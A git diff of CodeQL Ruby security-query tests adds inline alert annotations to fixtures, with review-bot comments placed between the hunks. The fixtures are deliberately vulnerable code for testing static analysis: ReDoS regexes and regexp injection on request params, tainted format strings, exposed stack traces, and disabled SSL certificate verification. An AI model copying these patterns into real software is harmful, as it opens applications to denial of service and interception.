b/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.qlref index 5807dc56fa07..28e7aa939063 100644 --- a/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.qlref +++ b/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.qlref @@ -1 +1,2 @@ -queries/security/cwe-1333/PolynomialReDoS.ql +query: queries/security/cwe-1333/PolynomialReDoS.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.rb b/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.rb index 2f73209321f2..117908eb881f 100644 --- a/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.rb +++ b/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.rb 
@@ -1,35 +1,35 @@ class FooController < ActionController::Base def some_request_handler # A source for the data-flow query (i.e. a remote flow source) - name = params[:name] + name = params[:name] # $ Source # A vulnerable regex regex = /^\s+|\s+$/ # Various sinks that match the source against the regex - name =~ regex # NOT GOOD - name !~ regex # NOT GOOD - name[regex] # NOT GOOD - name.gsub regex, '' # NOT GOOD - name.index regex # NOT GOOD - name.match regex # NOT GOOD - name.match? regex # NOT GOOD - name.partition regex # NOT GOOD - name.rindex regex # NOT GOOD - name.rpartition regex # NOT GOOD - name.scan regex # NOT GOOD - name.split regex # NOT GOOD - name.sub regex, '' # NOT GOOD - regex.match name # NOT GOOD - regex.match? name # NOT GOOD + name =~ regex # NOT GOOD # $ Alert + name !~ regex # NOT GOOD # $ Alert + name[regex] # NOT GOOD # $ Alert + name.gsub regex, '' # NOT GOOD # $ Alert + name.index regex # NOT GOOD # $ Alert + name.match regex # NOT GOOD # $ Alert + name.match? regex # NOT GOOD # $ Alert + name.partition regex # NOT GOOD # $ Alert + name.rindex regex # NOT GOOD # $ Alert + name.rpartition regex # NOT GOOD # $ Alert + name.scan regex # NOT GOOD # $ Alert + name.split regex # NOT GOOD # $ Alert + name.sub regex, '' # NOT GOOD # $ Alert + regex.match name # NOT GOOD # $ Alert + regex.match? name # NOT GOOD # $ Alert # Destructive variants - a = params[:b] - a.gsub! regex, '' # NOT GOOD - b = params[:a] - b.slice! regex # NOT GOOD - c = params[:c] - c.sub! regex, '' # NOT GOOD + a = params[:b] # $ Source + a.gsub! regex, '' # NOT GOOD # $ Alert + b = params[:a] # $ Source + b.slice! regex # NOT GOOD # $ Alert + c = params[:c] # $ Source + c.sub! regex, '' # NOT GOOD # $ Alert # GOOD - guarded by a string length check if name.length < 1024 
@@ -39,19 +39,19 @@ def some_request_handler # GOOD - regex does not suffer from polynomial backtracking (regression test) params[:foo] =~ /\A[bc].*\Z/ - case name # NOT GOOD + case name # NOT GOOD # $ Sink when regex puts "foo" - end + end # $ Alert - case name # NOT GOOD + case name # NOT GOOD # $ Sink in /^\s+|\s+$/ then puts "foo" - end + end # $ Alert end def some_other_request_handle - name = params[:name] # source + name = params[:name] # source # $ Source indirect_use_of_reg /^\s+|\s+$/, name @@ -59,22 +59,22 @@ def some_other_request_handle end def indirect_use_of_reg (reg, input) - input.gsub reg, '' # NOT GOOD + input.gsub reg, '' # NOT GOOD # $ Alert end def as_string_indirect (reg_as_string, input) - input.match? reg_as_string, '' # NOT GOOD + input.match? reg_as_string, '' # NOT GOOD # $ Alert end def re_compile_indirect - name = params[:name] # source + name = params[:name] # source # $ Source reg = Regexp.new '^\s+|\s+$' re_compile_indirect_2 reg, name end def re_compile_indirect_2 (reg, input) - input.gsub reg, '' # NOT GOOD + input.gsub reg, '' # NOT GOOD # $ Alert end # See https://github.com/dependabot/dependabot-core/blob/37dc1767fde9b7184020763f4d0c1434f93d11d6/python/lib/dependabot/python/requirement_parser.rb#L6-L25 @@ -100,8 +100,8 @@ def re_compile_indirect_2 (reg, input) MARKER_EXPR = /(#{MARKER_EXPR_ONE}|\(\s*|\s*\)|\s+and\s+|\s+or\s+)+/ def use_marker_expr - name = params[:name] # source + name = params[:name] # source # $ Source - name =~ MARKER_EXPR + name =~ MARKER_EXPR # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/lib/index.rb b/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/lib/index.rb index b6bf9570f4d0..9ec0a2082d02 100644 --- a/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/lib/index.rb +++ b/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/lib/index.rb 
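Review bot: In both `case name` blocks the `# $ Alert` marker sits on the closing `end`, while the older `# NOT GOOD` comment and the new `# $ Sink` marker stay on the `case name` line, and nothing in the file explains the split. The updated `.expected` output reports these alerts over the whole `case ...` expression (42:5 to 45:7 and 47:5 to 50:7), so the marker presumably follows the last line of the result's location; that is inferred from the output, not stated in the hunk. A one-line comment above the first block would stop a later edit from moving the marker back to the `case` line, for example `# The alert spans the whole case expression, so its marker sits on the closing end.` `some_request_handler` begins before this hunk.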
@@ -1,13 +1,13 @@ module Foo - def bar(x) + def bar(x) # $ Source # Run the /a+$/ regex on the input x. - match = x.match(/a+$/) + match = x.match(/a+$/) # $ Alert end protected - def baz(x) - match = x.match(/a+$/) + def baz(x) # $ Source + match = x.match(/a+$/) # $ Alert - match2 = x.match(/(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)C.*Y$/) + match2 = x.match(/(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)C.*Y$/) # $ Alert end end \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.expected b/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.expected index 13643e2c07e5..6a4c79e1fa4f 100644 --- a/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.expected +++ b/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.expected 
@@ -1,3 +1,9 @@ +#select +| RegExpInjection.rb:5:13:5:21 | /#{...}/ | RegExpInjection.rb:4:12:4:17 | call to params | RegExpInjection.rb:5:13:5:21 | /#{...}/ | This regular expression depends on a $@. | RegExpInjection.rb:4:12:4:17 | call to params | user-provided value | +| RegExpInjection.rb:11:13:11:27 | /foo#{...}bar/ | RegExpInjection.rb:10:12:10:17 | call to params | RegExpInjection.rb:11:13:11:27 | /foo#{...}bar/ | This regular expression depends on a $@. | RegExpInjection.rb:10:12:10:17 | call to params | user-provided value | +| RegExpInjection.rb:17:24:17:27 | name | RegExpInjection.rb:16:12:16:17 | call to params | RegExpInjection.rb:17:24:17:27 | name | This regular expression depends on a $@. | RegExpInjection.rb:16:12:16:17 | call to params | user-provided value | +| RegExpInjection.rb:23:24:23:33 | ... + ... | RegExpInjection.rb:22:12:22:17 | call to params | RegExpInjection.rb:23:24:23:33 | ... + ... | This regular expression depends on a $@. | RegExpInjection.rb:22:12:22:17 | call to params | user-provided value | +| RegExpInjection.rb:55:28:55:37 | ... + ... | RegExpInjection.rb:54:12:54:17 | call to params | RegExpInjection.rb:55:28:55:37 | ... + ... | This regular expression depends on a $@. | RegExpInjection.rb:54:12:54:17 | call to params | user-provided value | edges | RegExpInjection.rb:4:5:4:8 | name | RegExpInjection.rb:5:13:5:21 | /#{...}/ | provenance | AdditionalTaintStep | | RegExpInjection.rb:4:12:4:17 | call to params | RegExpInjection.rb:4:12:4:24 | ...[...] | provenance | | 
@@ -42,9 +48,3 @@ nodes | RegExpInjection.rb:55:28:55:37 | ... + ... | semmle.label | ... + ... | | RegExpInjection.rb:55:34:55:37 | name | semmle.label | name | subpaths -#select -| RegExpInjection.rb:5:13:5:21 | /#{...}/ | RegExpInjection.rb:4:12:4:17 | call to params | RegExpInjection.rb:5:13:5:21 | /#{...}/ | This regular expression depends on a $@. | RegExpInjection.rb:4:12:4:17 | call to params | user-provided value | -| RegExpInjection.rb:11:13:11:27 | /foo#{...}bar/ | RegExpInjection.rb:10:12:10:17 | call to params | RegExpInjection.rb:11:13:11:27 | /foo#{...}bar/ | This regular expression depends on a $@. | RegExpInjection.rb:10:12:10:17 | call to params | user-provided value | -| RegExpInjection.rb:17:24:17:27 | name | RegExpInjection.rb:16:12:16:17 | call to params | RegExpInjection.rb:17:24:17:27 | name | This regular expression depends on a $@. | RegExpInjection.rb:16:12:16:17 | call to params | user-provided value | -| RegExpInjection.rb:23:24:23:33 | ... + ... | RegExpInjection.rb:22:12:22:17 | call to params | RegExpInjection.rb:23:24:23:33 | ... + ... | This regular expression depends on a $@. | RegExpInjection.rb:22:12:22:17 | call to params | user-provided value | -| RegExpInjection.rb:55:28:55:37 | ... + ... | RegExpInjection.rb:54:12:54:17 | call to params | RegExpInjection.rb:55:28:55:37 | ... + ... | This regular expression depends on a $@. | RegExpInjection.rb:54:12:54:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.qlref b/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.qlref index 11c9e7230269..2623c876bf6c 100644 --- a/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.qlref +++ b/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.qlref 
@@ -1 +1,2 @@ -queries/security/cwe-1333/RegExpInjection.ql +query: queries/security/cwe-1333/RegExpInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.rb b/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.rb index aca47e42e60c..469c084a75b1 100644 --- a/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.rb +++ b/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.rb @@ -1,26 +1,26 @@ class FooController < ActionController::Base # BAD def route0 - name = params[:name] - regex = /#{name}/ + name = params[:name] # $ Source + regex = /#{name}/ # $ Alert end # BAD def route1 - name = params[:name] - regex = /foo#{name}bar/ + name = params[:name] # $ Source + regex = /foo#{name}bar/ # $ Alert end # BAD def route2 - name = params[:name] - regex = Regexp.new(name) + name = params[:name] # $ Source + regex = Regexp.new(name) # $ Alert end # BAD def route3 - name = params[:name] - regex = Regexp.new("@" + name) + name = params[:name] # $ Source + regex = Regexp.new("@" + name) # $ Alert end # GOOD - string is compared against a constant string @@ -51,7 +51,7 @@ def route7 # BAD def route8 - name = params[:name] - regex = Regexp.compile("@" + name) + name = params[:name] # $ Source + regex = Regexp.compile("@" + name) # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.expected b/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.expected index 104b9d3ada07..58907596bd7d 100644 --- a/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.expected +++ b/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.expected 
@@ -1,3 +1,17 @@ +#select +| tainted_format_string.rb:4:12:4:26 | ...[...] | tainted_format_string.rb:4:12:4:17 | call to params | tainted_format_string.rb:4:12:4:26 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:4:12:4:17 | call to params | user-provided value | +| tainted_format_string.rb:5:19:5:33 | ...[...] | tainted_format_string.rb:5:19:5:24 | call to params | tainted_format_string.rb:5:19:5:33 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:5:19:5:24 | call to params | user-provided value | +| tainted_format_string.rb:10:23:10:37 | ...[...] | tainted_format_string.rb:10:23:10:28 | call to params | tainted_format_string.rb:10:23:10:37 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:10:23:10:28 | call to params | user-provided value | +| tainted_format_string.rb:11:30:11:44 | ...[...] | tainted_format_string.rb:11:30:11:35 | call to params | tainted_format_string.rb:11:30:11:44 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:11:30:11:35 | call to params | user-provided value | +| tainted_format_string.rb:18:23:18:37 | ...[...] | tainted_format_string.rb:18:23:18:28 | call to params | tainted_format_string.rb:18:23:18:37 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:18:23:18:28 | call to params | user-provided value | +| tainted_format_string.rb:19:30:19:44 | ...[...] | tainted_format_string.rb:19:30:19:35 | call to params | tainted_format_string.rb:19:30:19:44 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:19:30:19:35 | call to params | user-provided value | +| tainted_format_string.rb:21:27:21:41 | ...[...] | tainted_format_string.rb:21:27:21:32 | call to params | tainted_format_string.rb:21:27:21:41 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:21:27:21:32 | call to params | user-provided value | +| tainted_format_string.rb:22:20:22:34 | ...[...] 
| tainted_format_string.rb:22:20:22:25 | call to params | tainted_format_string.rb:22:20:22:34 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:22:20:22:25 | call to params | user-provided value | +| tainted_format_string.rb:28:19:28:33 | ...[...] | tainted_format_string.rb:28:19:28:24 | call to params | tainted_format_string.rb:28:19:28:33 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:28:19:28:24 | call to params | user-provided value | +| tainted_format_string.rb:33:12:33:46 | ... + ... | tainted_format_string.rb:33:32:33:37 | call to params | tainted_format_string.rb:33:12:33:46 | ... + ... | Format string depends on a $@. | tainted_format_string.rb:33:32:33:37 | call to params | user-provided value | +| tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | tainted_format_string.rb:36:30:36:35 | call to params | tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | Format string depends on a $@. | tainted_format_string.rb:36:30:36:35 | call to params | user-provided value | +| tainted_format_string.rb:39:5:39:45 | "A log message #{...} %{foo}" | tainted_format_string.rb:39:22:39:27 | call to params | tainted_format_string.rb:39:5:39:45 | "A log message #{...} %{foo}" | Format string depends on a $@. | tainted_format_string.rb:39:22:39:27 | call to params | user-provided value | +| tainted_format_string.rb:42:5:42:43 | "A log message #{...} %08x" | tainted_format_string.rb:42:22:42:27 | call to params | tainted_format_string.rb:42:5:42:43 | "A log message #{...} %08x" | Format string depends on a $@. | tainted_format_string.rb:42:22:42:27 | call to params | user-provided value | edges | tainted_format_string.rb:4:12:4:17 | call to params | tainted_format_string.rb:4:12:4:26 | ...[...] | provenance | | | tainted_format_string.rb:5:19:5:24 | call to params | tainted_format_string.rb:5:19:5:33 | ...[...] | provenance | | 
@@ -48,17 +62,3 @@ nodes | tainted_format_string.rb:42:22:42:27 | call to params | semmle.label | call to params | | tainted_format_string.rb:42:22:42:36 | ...[...] | semmle.label | ...[...] | subpaths -#select -| tainted_format_string.rb:4:12:4:26 | ...[...] | tainted_format_string.rb:4:12:4:17 | call to params | tainted_format_string.rb:4:12:4:26 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:4:12:4:17 | call to params | user-provided value | -| tainted_format_string.rb:5:19:5:33 | ...[...] | tainted_format_string.rb:5:19:5:24 | call to params | tainted_format_string.rb:5:19:5:33 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:5:19:5:24 | call to params | user-provided value | -| tainted_format_string.rb:10:23:10:37 | ...[...] | tainted_format_string.rb:10:23:10:28 | call to params | tainted_format_string.rb:10:23:10:37 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:10:23:10:28 | call to params | user-provided value | -| tainted_format_string.rb:11:30:11:44 | ...[...] | tainted_format_string.rb:11:30:11:35 | call to params | tainted_format_string.rb:11:30:11:44 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:11:30:11:35 | call to params | user-provided value | -| tainted_format_string.rb:18:23:18:37 | ...[...] | tainted_format_string.rb:18:23:18:28 | call to params | tainted_format_string.rb:18:23:18:37 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:18:23:18:28 | call to params | user-provided value | -| tainted_format_string.rb:19:30:19:44 | ...[...] | tainted_format_string.rb:19:30:19:35 | call to params | tainted_format_string.rb:19:30:19:44 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:19:30:19:35 | call to params | user-provided value | -| tainted_format_string.rb:21:27:21:41 | ...[...] | tainted_format_string.rb:21:27:21:32 | call to params | tainted_format_string.rb:21:27:21:41 | ...[...] 
| Format string depends on a $@. | tainted_format_string.rb:21:27:21:32 | call to params | user-provided value | -| tainted_format_string.rb:22:20:22:34 | ...[...] | tainted_format_string.rb:22:20:22:25 | call to params | tainted_format_string.rb:22:20:22:34 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:22:20:22:25 | call to params | user-provided value | -| tainted_format_string.rb:28:19:28:33 | ...[...] | tainted_format_string.rb:28:19:28:24 | call to params | tainted_format_string.rb:28:19:28:33 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:28:19:28:24 | call to params | user-provided value | -| tainted_format_string.rb:33:12:33:46 | ... + ... | tainted_format_string.rb:33:32:33:37 | call to params | tainted_format_string.rb:33:12:33:46 | ... + ... | Format string depends on a $@. | tainted_format_string.rb:33:32:33:37 | call to params | user-provided value | -| tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | tainted_format_string.rb:36:30:36:35 | call to params | tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | Format string depends on a $@. | tainted_format_string.rb:36:30:36:35 | call to params | user-provided value | -| tainted_format_string.rb:39:5:39:45 | "A log message #{...} %{foo}" | tainted_format_string.rb:39:22:39:27 | call to params | tainted_format_string.rb:39:5:39:45 | "A log message #{...} %{foo}" | Format string depends on a $@. | tainted_format_string.rb:39:22:39:27 | call to params | user-provided value | -| tainted_format_string.rb:42:5:42:43 | "A log message #{...} %08x" | tainted_format_string.rb:42:22:42:27 | call to params | tainted_format_string.rb:42:5:42:43 | "A log message #{...} %08x" | Format string depends on a $@. | tainted_format_string.rb:42:22:42:27 | call to params | user-provided value | 
diff --git a/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.qlref b/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.qlref index c8e1c80ec408..f688cc3f7e3f 100644 --- a/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.qlref +++ b/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.qlref @@ -1 +1,2 @@ -queries/security/cwe-134/TaintedFormatString.ql +query: queries/security/cwe-134/TaintedFormatString.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-134/tainted_format_string.rb b/ruby/ql/test/query-tests/security/cwe-134/tainted_format_string.rb index aa66a9aa4704..cff03a07ef06 100644 --- a/ruby/ql/test/query-tests/security/cwe-134/tainted_format_string.rb +++ b/ruby/ql/test/query-tests/security/cwe-134/tainted_format_string.rb 
@@ -1,44 +1,44 @@ class UsersController < ActionController::Base def show - printf(params[:format], arg) # BAD - Kernel.printf(params[:format], arg) # BAD + printf(params[:format], arg) # BAD # $ Alert + Kernel.printf(params[:format], arg) # BAD # $ Alert printf(params[:format]) # GOOD Kernel.printf(params[:format]) # GOOD - printf(IO.new(1), params[:format], arg) # BAD - Kernel.printf(IO.new(1), params[:format], arg) # BAD + printf(IO.new(1), params[:format], arg) # BAD # $ Alert + Kernel.printf(IO.new(1), params[:format], arg) # BAD # $ Alert printf("%s", params[:format]) # GOOD Kernel.printf("%s", params[:format]) # GOOD fmt = "%s" printf(fmt, params[:format]) # GOOD - printf(IO.new(1), params[:format]) # GOOD [FALSE POSITIVE] - Kernel.printf(IO.new(1), params[:format]) # GOOD [FALSE POSITIVE] + printf(IO.new(1), params[:format]) # GOOD [FALSE POSITIVE] # $ Alert + Kernel.printf(IO.new(1), params[:format]) # GOOD [FALSE POSITIVE] # $ Alert - str1 = Kernel.sprintf(params[:format], arg) # BAD - str2 = sprintf(params[:format], arg) # BAD + str1 = Kernel.sprintf(params[:format], arg) # BAD # $ Alert + str2 = sprintf(params[:format], arg) # BAD # $ Alert str1 = Kernel.sprintf(params[:format]) # GOOD str2 = sprintf(params[:format]) # GOOD stdout = IO.new 1 - stdout.printf(params[:format], arg) # BAD + stdout.printf(params[:format], arg) # BAD # $ Alert stdout.printf(params[:format]) # GOOD # Taint via string concatenation - printf("A log message: " + params[:format], arg) # BAD + printf("A log message: " + params[:format], arg) # BAD # $ Alert # Taint via string interpolation - printf("A log message: #{params[:format]}", arg) # BAD + printf("A log message: #{params[:format]}", arg) # BAD # $ Alert # Using String# - "A log message #{params[:format]} %{foo}" % {foo: "foo"} # BAD + "A log message #{params[:format]} %{foo}" % {foo: "foo"} # BAD # $ Alert # String# with an array - "A log message #{params[:format]} %08x" % ["foo"] # BAD + "A log message #{params[:format]} 
%08x" % ["foo"] # BAD # $ Alert end end \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.expected b/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.expected index 00e0b4317de2..24404e8f1a9f 100644 --- a/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.expected +++ b/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.expected @@ -1,3 +1,7 @@ +#select +| StackTraceExposure.rb:6:18:6:28 | call to backtrace | StackTraceExposure.rb:6:18:6:28 | call to backtrace | StackTraceExposure.rb:6:18:6:28 | call to backtrace | $@ can be exposed to an external user. | StackTraceExposure.rb:6:18:6:28 | call to backtrace | Error information | +| StackTraceExposure.rb:12:18:12:19 | bt | StackTraceExposure.rb:11:10:11:17 | call to caller | StackTraceExposure.rb:12:18:12:19 | bt | $@ can be exposed to an external user. | StackTraceExposure.rb:11:10:11:17 | call to caller | Error information | +| StackTraceExposure.rb:18:18:18:28 | call to backtrace | StackTraceExposure.rb:18:18:18:28 | call to backtrace | StackTraceExposure.rb:18:18:18:28 | call to backtrace | $@ can be exposed to an external user. | StackTraceExposure.rb:18:18:18:28 | call to backtrace | Error information | edges | StackTraceExposure.rb:11:5:11:6 | bt | StackTraceExposure.rb:12:18:12:19 | bt | provenance | | | StackTraceExposure.rb:11:10:11:17 | call to caller | StackTraceExposure.rb:11:5:11:6 | bt | provenance | | 
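Review bot: The two calls commented `# GOOD [FALSE POSITIVE]` (`printf(IO.new(1), params[:format])` and its `Kernel.printf` form) are annotated with a plain `# $ Alert`, which records a known false positive as if it were a wanted result. The inline-expectations format has a `SPURIOUS:` prefix for this case, so the line would read `printf(IO.new(1), params[:format]) # GOOD [FALSE POSITIVE] # $ SPURIOUS: Alert`, and likewise for the `Kernel.printf` line. That keeps the test passing with the current query while the annotation itself says the result is unwanted, so a reader of this security test does not take a format string with no arguments as a true finding.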
@@ -8,7 +12,3 @@ nodes | StackTraceExposure.rb:12:18:12:19 | bt | semmle.label | bt | | StackTraceExposure.rb:18:18:18:28 | call to backtrace | semmle.label | call to backtrace | subpaths -#select -| StackTraceExposure.rb:6:18:6:28 | call to backtrace | StackTraceExposure.rb:6:18:6:28 | call to backtrace | StackTraceExposure.rb:6:18:6:28 | call to backtrace | $@ can be exposed to an external user. | StackTraceExposure.rb:6:18:6:28 | call to backtrace | Error information | -| StackTraceExposure.rb:12:18:12:19 | bt | StackTraceExposure.rb:11:10:11:17 | call to caller | StackTraceExposure.rb:12:18:12:19 | bt | $@ can be exposed to an external user. | StackTraceExposure.rb:11:10:11:17 | call to caller | Error information | -| StackTraceExposure.rb:18:18:18:28 | call to backtrace | StackTraceExposure.rb:18:18:18:28 | call to backtrace | StackTraceExposure.rb:18:18:18:28 | call to backtrace | $@ can be exposed to an external user. | StackTraceExposure.rb:18:18:18:28 | call to backtrace | Error information | diff --git a/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.qlref b/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.qlref index c110f2b1765c..ebd3ae1cee14 100644 --- a/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.qlref +++ b/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.qlref @@ -1 +1,2 @@ -queries/security/cwe-209/StackTraceExposure.ql \ No newline at end of file +query: queries/security/cwe-209/StackTraceExposure.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.rb b/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.rb index dcdf5c1f22ca..19e0c7972cf7 100644 --- a/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.rb +++ b/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.rb 
@@ -3,19 +3,19 @@ class FooController < ApplicationController def show something_that_might_fail() rescue => e - render body: e.backtrace, content_type: "text/plain" + render body: e.backtrace, content_type: "text/plain" # $ Alert end def show2 - bt = caller() - render body: bt, content_type: "text/plain" + bt = caller() # $ Source + render body: bt, content_type: "text/plain" # $ Alert end def show3 not_a_method() rescue NoMethodError => e - render body: e.backtrace, content_type: "text/plain" + render body: e.backtrace, content_type: "text/plain" # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-295/Excon.rb b/ruby/ql/test/query-tests/security/cwe-295/Excon.rb index 8bdabc31cf28..7838be7dfcdb 100644 --- a/ruby/ql/test/query-tests/security/cwe-295/Excon.rb +++ b/ruby/ql/test/query-tests/security/cwe-295/Excon.rb @@ -3,31 +3,31 @@ def method1 # BAD Excon.defaults[:ssl_verify_peer] = false - Excon.get("http://example.com/") + Excon.get("http://example.com/") # $ Alert end def method2 # BAD Excon.ssl_verify_peer = false - Excon.get("http://example.com/") + Excon.get("http://example.com/") # $ Alert end def method3(secure) # BAD Excon.defaults[:ssl_verify_peer] = (secure ? true : false) - Excon.get("http://example.com/") + Excon.get("http://example.com/") # $ Alert end def method4 # BAD conn = Excon::Connection.new("http://example.com/", ssl_verify_peer: false) - conn.get + conn.get # $ Alert end def method5 # BAD Excon.ssl_verify_peer = true - Excon.new("http://example.com/", ssl_verify_peer: false).get + Excon.new("http://example.com/", ssl_verify_peer: false).get # $ Alert end def method6 diff --git a/ruby/ql/test/query-tests/security/cwe-295/Faraday.rb b/ruby/ql/test/query-tests/security/cwe-295/Faraday.rb index 6c12db2c9e6e..1e298b82aebc 100644 --- a/ruby/ql/test/query-tests/security/cwe-295/Faraday.rb +++ b/ruby/ql/test/query-tests/security/cwe-295/Faraday.rb 
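Review bot: In Excon.rb the `# BAD` marker stays on the line that turns verification off (`Excon.defaults[:ssl_verify_peer] = false`, `Excon.ssl_verify_peer = false`), while the new `# $ Alert` sits on the following request line, and nothing in the fixture explains the split. A short header comment would help, for example `# Alerts are reported at the request; the preceding line is where certificate validation is disabled.` The annotated requests also use `http://` URLs, so it is worth stating that the expectation does not depend on the scheme, or switching the fixtures to `https://`. The same applies to the `http://` requests in the Faraday.rb and Httparty.rb hunks. `method6` continues outside this hunk.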
@@ -2,11 +2,11 @@ # BAD connection = Faraday.new("http://example.com", ssl: { verify: false }) -response = connection.get("/") +response = connection.get("/") # $ Alert # BAD connection = Faraday.new("http://example.com", ssl: { verify_mode: OpenSSL::SSL::VERIFY_NONE }) -response = connection.get("/") +response = connection.get("/") # $ Alert # GOOD connection = Faraday.new("http://example.com") @@ -32,7 +32,7 @@ def verify_as_arg(host, path, arg) # BAD, due to the call below connection = Faraday.new(host, ssl: { verify: arg }) - response = connection.get(path) + response = connection.get(path) # $ Alert end verify_as_arg("http://example.com", "/", false) @@ -41,7 +41,7 @@ def verify_as_arg(host, path, arg) def verify_mode_as_arg(host, path, arg) # BAD, due to the call below connection = Faraday.new(host, ssl: { verify_mode: arg }) - response = connection.get(path) + response = connection.get(path) # $ Alert end verify_mode_as_arg("http://example.com", "/", OpenSSL::SSL::VERIFY_NONE) diff --git a/ruby/ql/test/query-tests/security/cwe-295/HttpClient.rb b/ruby/ql/test/query-tests/security/cwe-295/HttpClient.rb index 902950e5be9e..dccbc0f8b523 100644 --- a/ruby/ql/test/query-tests/security/cwe-295/HttpClient.rb +++ b/ruby/ql/test/query-tests/security/cwe-295/HttpClient.rb @@ -3,7 +3,7 @@ # BAD client = HTTPClient.new client.ssl_config.verify_mode = OpenSSL::SSL::VERIFY_NONE -client.get("https://example.com") +client.get("https://example.com") # $ Alert # GOOD client = HTTPClient.new diff --git a/ruby/ql/test/query-tests/security/cwe-295/Httparty.rb b/ruby/ql/test/query-tests/security/cwe-295/Httparty.rb index 562cbbc1f435..575744da9e86 100644 --- a/ruby/ql/test/query-tests/security/cwe-295/Httparty.rb +++ b/ruby/ql/test/query-tests/security/cwe-295/Httparty.rb 
